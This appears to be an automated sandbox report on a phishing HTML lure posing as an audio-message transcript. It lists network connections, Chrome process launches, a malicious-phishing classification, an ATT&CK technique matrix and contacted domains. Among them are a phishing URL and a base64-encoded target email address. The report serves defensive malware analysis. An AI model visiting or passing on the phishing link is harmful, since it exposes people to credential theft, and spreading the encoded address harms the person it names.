Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50463 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50474 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 50369 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50277 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50420 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50458
Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50336
Source: unknownNetwork traffic detected: HTTP traffic on port 50443 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50457
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50218
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50459
Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50331
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50212
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50454
Source: unknownNetwork traffic detected: HTTP traffic on port 50489 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50332
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50453
Source: unknownNetwork traffic detected: HTTP traffic on port 50466 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50335
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50456
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50213
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50455
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50348
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50469
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50468
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50349
Source: unknownNetwork traffic detected: HTTP traffic on port 50505 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50461
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50460
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50463
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50462
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50223
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50344
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50464
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50467
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50224
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50466
Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50289 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50455 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50470
Source: unknownNetwork traffic detected: HTTP traffic on port 50512 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50479
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50230
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50472
Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50317 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50471
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50353
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50474
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50231
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50473
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50234
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50476
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50354
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50475
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50478
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50477
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50481
Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50480
Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50213 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50490 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50249
Source: unknownNetwork traffic detected: HTTP traffic on port 50385 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50369
Source: unknownNetwork traffic detected: HTTP traffic on port 50467 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
Source: unknownNetwork traffic detected: HTTP traffic on port 50524 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50442 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50362
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50483
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50240
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50482
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50485
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50242
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50484
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50487
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50365
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50486
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
Source: unknownNetwork traffic detected: HTTP traffic on port 50224 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50247
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50489
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50367
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50488
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50490
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50492
Source: unknownNetwork traffic detected: HTTP traffic on port 50535 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50370
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50491
Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 50478 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50414
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50535
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50534
Source: unknownNetwork traffic detected: HTTP traffic on port 50504 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50537
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50415
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50536
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50538
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50530
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50412
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50533
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50411
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50532
Source: unknownNetwork traffic detected: HTTP traffic on port 50513 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50536 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50433 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50362 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50425
Source: unknownNetwork traffic detected: HTTP traffic on port 50444 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50427
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50426
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50429
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50428
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50540
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50300
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50421
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50542
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50420
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50541
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50423
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50544
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50301
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50422
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50212 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50436
Source: unknownNetwork traffic detected: HTTP traffic on port 50384 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50435
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50317
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50438
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50437
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50319
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50439
Source: unknownNetwork traffic detected: HTTP traffic on port 50525 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50430
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50311
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50432
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50313
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50434
Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50433
Source: unknownNetwork traffic detected: HTTP traffic on port 50454 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50477 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50349 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50205
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50326
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50447
Source: unknownNetwork traffic detected: HTTP traffic on port 50503 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50204
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50446
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50207
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50449
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50448
Source: unknownNetwork traffic detected: HTTP traffic on port 50421 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50441
Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50440
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50201
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50442
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50445
Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50444
Source: unknownNetwork traffic detected: HTTP traffic on port 50432 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50514 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50409 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50499 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50175
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50297
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50179
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50178
Source: unknownNetwork traffic detected: HTTP traffic on port 50319 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50180
Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50526 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50423 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50185
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
Source: unknownNetwork traffic detected: HTTP traffic on port 50331 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50189
Source: unknownNetwork traffic detected: HTTP traffic on port 50469 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50434 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50195
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
Source: unknownNetwork traffic detected: HTTP traffic on port 50537 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50204 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50502 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50445 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50470 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50388 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50422 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50199
Source: unknownNetwork traffic detected: HTTP traffic on port 50332 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
Source: unknownNetwork traffic detected: HTTP traffic on port 50515 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
Source: unknownNetwork traffic detected: HTTP traffic on port 50538 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50458 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50492 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50297 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50354 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50481 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
Source: unknownNetwork traffic detected: HTTP traffic on port 50411 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50365 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50527 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50259
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50494
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50493
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50496
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49860 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49863 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49983 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49996 version: TLS 1.2

System Summary

barindex
Source: Name includes: AudioplaybackVM--00-32AoTranscript.htmlInitial sample: play
Source: classification engineClassification label: mal64.phis.evad.winHTML@31/677@48/19
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\AudioplaybackVM--00-32AoTranscript.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1984,i,1170405729456523145,12135267861160028348,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1984,i,1170405729456523145,12135267861160028348,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected

Data Obfuscation

barindex
Source: https://j9lg.xbyhiqbjl.com/admi/#X#YnJ5YW5faGFydG1hbkBhby51c2NvdXJ0cy5nb3Y=HTTP Parser: https://j9lg.xbyhiqbjl.com/admi/#X#YnJ5YW5faGFydG1hbkBhby51c2NvdXJ0cy5nb3Y=
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf).0%Avira URL Cloudsafe
https://j9lg.xbyhiqbjl.com/admi/0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
karaokebooks.net
69.49.245.172
truefalse
    high
    j9lg.xbyhiqbjl.com
    172.67.211.241
    truetrue
      unknown
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        code.jquery.com
        151.101.66.137
        truefalse
          high
          cdnjs.cloudflare.com
          104.17.25.14
          truefalse
            high
            challenges.cloudflare.com
            104.18.95.41
            truefalse
              high
              sni1gl.wpc.omegacdn.net
              152.199.21.175
